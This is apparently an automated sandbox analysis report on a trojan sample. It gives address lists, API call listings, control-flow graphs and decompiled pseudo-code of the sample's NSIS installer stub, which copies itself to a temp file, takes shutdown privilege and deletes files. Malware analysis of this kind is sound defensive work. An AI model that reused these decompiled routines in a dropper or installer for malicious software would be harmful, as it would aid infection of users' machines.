                                                                                    0x00403995
                                                                                    0x00403b6c
                                                                                    0x00403b6c
                                                                                    0x00403b71
                                                                                    0x00403b7a
                                                                                    0x00403b97
                                                                                    0x00403c0f
                                                                                    0x00403c0f
                                                                                    0x00403c17
                                                                                    0x00403c19
                                                                                    0x00403c19
                                                                                    0x00403c1f
                                                                                    0x00403c1f
                                                                                    0x00403bae
                                                                                    0x00403bba
                                                                                    0x00403bcb
                                                                                    0x00403bd2
                                                                                    0x00403bd9
                                                                                    0x00403bd9
                                                                                    0x00403be1
                                                                                    0x00403bed
                                                                                    0x00403bfb
                                                                                    0x00403c06
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403bef
                                                                                    0x00403bef
                                                                                    0x00403bf0
                                                                                    0x00403bf2
                                                                                    0x00403bf3
                                                                                    0x00403bf4
                                                                                    0x00403bf9
                                                                                    0x00403c08
                                                                                    0x00403c0a
                                                                                    0x00000000
                                                                                    0x00403c0a
                                                                                    0x00000000
                                                                                    0x00403bf9
                                                                                    0x00403bed
                                                                                    0x00403b84
                                                                                    0x00403b8b
                                                                                    0x00403b8b
                                                                                    0x004039a1
                                                                                    0x00403a48
                                                                                    0x00403a48
                                                                                    0x00403a54
                                                                                    0x00000000
                                                                                    0x00403a54
                                                                                    0x004039b2
                                                                                    0x004039ba
                                                                                    0x00403a0c
                                                                                    0x00403a0c
                                                                                    0x00403a12
                                                                                    0x00403a19
                                                                                    0x00403a67
                                                                                    0x00403a69
                                                                                    0x00403a6e
                                                                                    0x00403a70
                                                                                    0x00403a78
                                                                                    0x00403a78
                                                                                    0x00403a83
                                                                                    0x00403a88
                                                                                    0x00403a8f
                                                                                    0x00403a95
                                                                                    0x00403a97
                                                                                    0x00403b6a
                                                                                    0x00403b6a
                                                                                    0x00403b6a
                                                                                    0x00000000
                                                                                    0x00403a9d
                                                                                    0x00403a9d
                                                                                    0x00403a9f
                                                                                    0x00403aa0
                                                                                    0x00403aa9
                                                                                    0x00403aa2
                                                                                    0x00403aa2
                                                                                    0x00403aa2
                                                                                    0x00403aaf
                                                                                    0x00403ab7
                                                                                    0x00403abe
                                                                                    0x00403ac6
                                                                                    0x00403ac6
                                                                                    0x00403ad3
                                                                                    0x00403adf
                                                                                    0x00403ae9
                                                                                    0x00403ae9
                                                                                    0x00403aeb
                                                                                    0x00403af2
                                                                                    0x00403afc
                                                                                    0x00403b08
                                                                                    0x00403b0e
                                                                                    0x00403b14
                                                                                    0x00403b17
                                                                                    0x00403b21
                                                                                    0x00403b27
                                                                                    0x00403b29
                                                                                    0x00403b2d
                                                                                    0x00403b3e
                                                                                    0x00403b44
                                                                                    0x00403b49
                                                                                    0x00403b4b
                                                                                    0x00403b4e
                                                                                    0x00403b54
                                                                                    0x00403b54
                                                                                    0x00403b4b
                                                                                    0x00403b29
                                                                                    0x00403b57
                                                                                    0x00403b5e
                                                                                    0x00403b5e
                                                                                    0x00403b5e
                                                                                    0x00403b5e
                                                                                    0x00403b65
                                                                                    0x00000000
                                                                                    0x00403b65
                                                                                    0x00403a97
                                                                                    0x00403a1b
                                                                                    0x00403a1e
                                                                                    0x00403a22
                                                                                    0x00403a27
                                                                                    0x00403a29
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a35
                                                                                    0x00403a40
                                                                                    0x00403a45
                                                                                    0x00000000
                                                                                    0x00403a45
                                                                                    0x004039c3
                                                                                    0x004039db
                                                                                    0x004039ec
                                                                                    0x004039ed
                                                                                    0x004039f1
                                                                                    0x004039f3
                                                                                    0x00403a01
                                                                                    0x00403a08
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a08
                                                                                    0x00403a0a
                                                                                    0x00000000
                                                                                    0x00403a0a
                                                                                    0x0040392d
                                                                                    0x00403939
                                                                                    0x0040393e
                                                                                    0x00403943
                                                                                    0x00403945
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040394d
                                                                                    0x00403955
                                                                                    0x00403966
                                                                                    0x0040396e
                                                                                    0x00403970
                                                                                    0x00403975
                                                                                    0x00403977
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403977
                                                                                    0x00000000
                                                                                    0x004038d4
                                                                                    0x0040387d
                                                                                    0x0040387f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403881
                                                                                    0x00403885
                                                                                    0x00403889
                                                                                    0x00403890
                                                                                    0x00403890
                                                                                    0x00403890
                                                                                    0x00403890
                                                                                    0x00000000
                                                                                    0x00403890
                                                                                    0x0040388b
                                                                                    0x0040388e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040388e
                                                                                    0x00403827
                                                                                    0x0040382b
                                                                                    0x0040382e
                                                                                    0x00403835
                                                                                    0x00403835
                                                                                    0x00000000
                                                                                    0x00403835
                                                                                    0x00403830
                                                                                    0x00403833
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403833
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403801
                                                                                    0x00403801
                                                                                    0x00403802
                                                                                    0x00403803
                                                                                    0x00403803
                                                                                    0x00000000
                                                                                    0x00403801
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" ,00000000), ref: 004037E9
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" ,00000000,?), ref: 00403A8F
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,00420F08,00000001), ref: 00403B21
                                                                                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                    • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                    • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                    • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                    • API String ID: 3859024572-3480895917
                                                                                    • Opcode ID: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                                                                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                    • Opcode Fuzzy Hash: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                                                                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 146 4059e4-4059f1 144->146 147 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->147 163 4058f3-40590d SendMessageW * 2 145->163 164 40590f-405912 145->164 149 4059f3-4059f9 146->149 150 405a0f-405a19 146->150 147->146 153 405a34-405a3d call 40462b 149->153 154 4059fb-405a0a ShowWindow * 2 call 4045f9 149->154 155 405a1b-405a21 150->155 156 405a6f-405a73 150->156 167 405a42-405a46 153->167 154->150 160 405a23-405a2f call 40459d 155->160 161 405a49-405a59 ShowWindow 155->161 156->153 158 405a75-405a7b 156->158 158->153 165 405a7d-405a90 SendMessageW 158->165 160->153 168 405a69-405a6a call 40459d 161->168 169 405a5b-405a64 call 4056ca 161->169 163->164 171 405922-405939 call 4045c4 164->171 172 405914-405920 SendMessageW 164->172 173 405b92-405b94 165->173 174 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 165->174 168->156 169->168 182 40593b-40594f ShowWindow 171->182 183 40596f-405990 GetDlgItem SendMessageW 171->183 172->171 173->167 180 405ac3-405ad3 GetWindowRect 174->180 181 405ad6-405aeb TrackPopupMenu 174->181 180->181 181->173 184 405af1-405b08 181->184 185 405951-40595c ShowWindow 182->185 186 40595e 182->186 183->173 187 405996-4059ae SendMessageW * 2 183->187 188 405b0d-405b28 SendMessageW 184->188 189 405964-40596a call 4045f9 185->189 186->189 187->173 188->188 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->173
                                                                                    C-Code - Quality: 95%
                                                                                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}


































                                                                                    0x00405811
                                                                                    0x00405817
                                                                                    0x00405821
                                                                                    0x00405824
                                                                                    0x004059ba
                                                                                    0x004059d7
                                                                                    0x004059de
                                                                                    0x004059de
                                                                                    0x004059f1
                                                                                    0x00405a0f
                                                                                    0x00405a11
                                                                                    0x00405a19
                                                                                    0x00405a6f
                                                                                    0x00405a73
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a75
                                                                                    0x00405a7b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a85
                                                                                    0x00405a8d
                                                                                    0x00405a90
                                                                                    0x00405b92
                                                                                    0x00000000
                                                                                    0x00405b92
                                                                                    0x00405a9f
                                                                                    0x00405aaa
                                                                                    0x00405ab3
                                                                                    0x00405abe
                                                                                    0x00405ac1
                                                                                    0x00405aca
                                                                                    0x00405ad0
                                                                                    0x00405ad3
                                                                                    0x00405ad3
                                                                                    0x00405aeb
                                                                                    0x00405af4
                                                                                    0x00405af7
                                                                                    0x00405afe
                                                                                    0x00405b05
                                                                                    0x00405b0d
                                                                                    0x00405b0d
                                                                                    0x00405b24
                                                                                    0x00405b24
                                                                                    0x00405b2b
                                                                                    0x00405b31
                                                                                    0x00405b3d
                                                                                    0x00405b44
                                                                                    0x00405b4d
                                                                                    0x00405b4f
                                                                                    0x00405b52
                                                                                    0x00405b61
                                                                                    0x00405b64
                                                                                    0x00405b6a
                                                                                    0x00405b6b
                                                                                    0x00405b71
                                                                                    0x00405b72
                                                                                    0x00405b73
                                                                                    0x00405b7b
                                                                                    0x00405b86
                                                                                    0x00405b8c
                                                                                    0x00405b8c
                                                                                    0x00000000
                                                                                    0x00405aeb
                                                                                    0x00405a21
                                                                                    0x00405a51
                                                                                    0x00405a59
                                                                                    0x00405a64
                                                                                    0x00405a64
                                                                                    0x00405a6a
                                                                                    0x00000000
                                                                                    0x00405a6a
                                                                                    0x00405a25
                                                                                    0x00405a2f
                                                                                    0x00000000
                                                                                    0x004059f3
                                                                                    0x004059f9
                                                                                    0x00405a34
                                                                                    0x00000000
                                                                                    0x00405a3d
                                                                                    0x00405a02
                                                                                    0x00405a07
                                                                                    0x00405a0a
                                                                                    0x00000000
                                                                                    0x00405a0a
                                                                                    0x004059f1
                                                                                    0x0040582a
                                                                                    0x0040582e
                                                                                    0x00405836
                                                                                    0x0040583a
                                                                                    0x0040583d
                                                                                    0x00405840
                                                                                    0x00405843
                                                                                    0x00405846
                                                                                    0x00405847
                                                                                    0x00405848
                                                                                    0x00405861
                                                                                    0x00405864
                                                                                    0x0040586e
                                                                                    0x0040587d
                                                                                    0x00405885
                                                                                    0x0040588d
                                                                                    0x00405892
                                                                                    0x00405895
                                                                                    0x004058a1
                                                                                    0x004058aa
                                                                                    0x004058b3
                                                                                    0x004058d5
                                                                                    0x004058db
                                                                                    0x004058ec
                                                                                    0x004058f1
                                                                                    0x004058ff
                                                                                    0x0040590d
                                                                                    0x0040590d
                                                                                    0x00405912
                                                                                    0x00405920
                                                                                    0x00405920
                                                                                    0x00405925
                                                                                    0x00405928
                                                                                    0x0040592d
                                                                                    0x00405939
                                                                                    0x00405942
                                                                                    0x0040594f
                                                                                    0x0040595e
                                                                                    0x00405951
                                                                                    0x00405956
                                                                                    0x00405956
                                                                                    0x0040596a
                                                                                    0x0040596a
                                                                                    0x0040597e
                                                                                    0x00405987
                                                                                    0x00405990
                                                                                    0x004059a0
                                                                                    0x004059ac
                                                                                    0x004059ac
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                    • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                                                    • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                    • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                    • CreatePopupMenu.USER32 ref: 00405A96
                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                    • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                    • EmptyClipboard.USER32 ref: 00405B31
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                    • CloseClipboard.USER32 ref: 00405B8C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: H7B${
                                                                                    • API String ID: 590372296-2256286769
                                                                                    • Opcode ID: c3d11cc47df71ab4d05679e65d974b621c0833f5037d3fed9a0d03fb4ea6e9ce
                                                                                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                    • Opcode Fuzzy Hash: c3d11cc47df71ab4d05679e65d974b621c0833f5037d3fed9a0d03fb4ea6e9ce
                                                                                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 448 405d74-405d9a call 40603f 451 405db3-405dba 448->451 452 405d9c-405dae DeleteFileW 448->452 454 405dbc-405dbe 451->454 455 405dcd-405ddd call 406668 451->455 453 405f30-405f34 452->453 456 405dc4-405dc7 454->456 457 405ede-405ee3 454->457 463 405dec-405ded call 405f83 455->463 464 405ddf-405dea lstrcatW 455->464 456->455 456->457 457->453 460 405ee5-405ee8 457->460 461 405ef2-405efa call 40699e 460->461 462 405eea-405ef0 460->462 461->453 472 405efc-405f10 call 405f37 call 405d2c 461->472 462->453 466 405df2-405df6 463->466 464->466 468 405e02-405e08 lstrcatW 466->468 469 405df8-405e00 466->469 471 405e0d-405e29 lstrlenW FindFirstFileW 468->471 469->468 469->471 473 405ed3-405ed7 471->473 474 405e2f-405e37 471->474 488 405f12-405f15 472->488 489 405f28-405f2b call 4056ca 472->489 473->457 479 405ed9 473->479 476 405e57-405e6b call 406668 474->476 477 405e39-405e41 474->477 490 405e82-405e8d call 405d2c 476->490 491 405e6d-405e75 476->491 480 405e43-405e4b 477->480 481 405eb6-405ec6 FindNextFileW 477->481 479->457 480->476 484 405e4d-405e55 480->484 481->474 487 405ecc-405ecd FindClose 481->487 484->476 484->481 487->473 488->462 493 405f17-405f26 call 4056ca call 406428 488->493 489->453 499 405eae-405eb1 call 4056ca 490->499 500 405e8f-405e92 490->500 491->481 494 405e77-405e80 call 405d74 491->494 493->453 494->481 499->481 503 405e94-405ea4 call 4056ca call 406428 500->503 504 405ea6-405eac 500->504 503->481 504->481
                                                                                    C-Code - Quality: 98%
                                                                                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
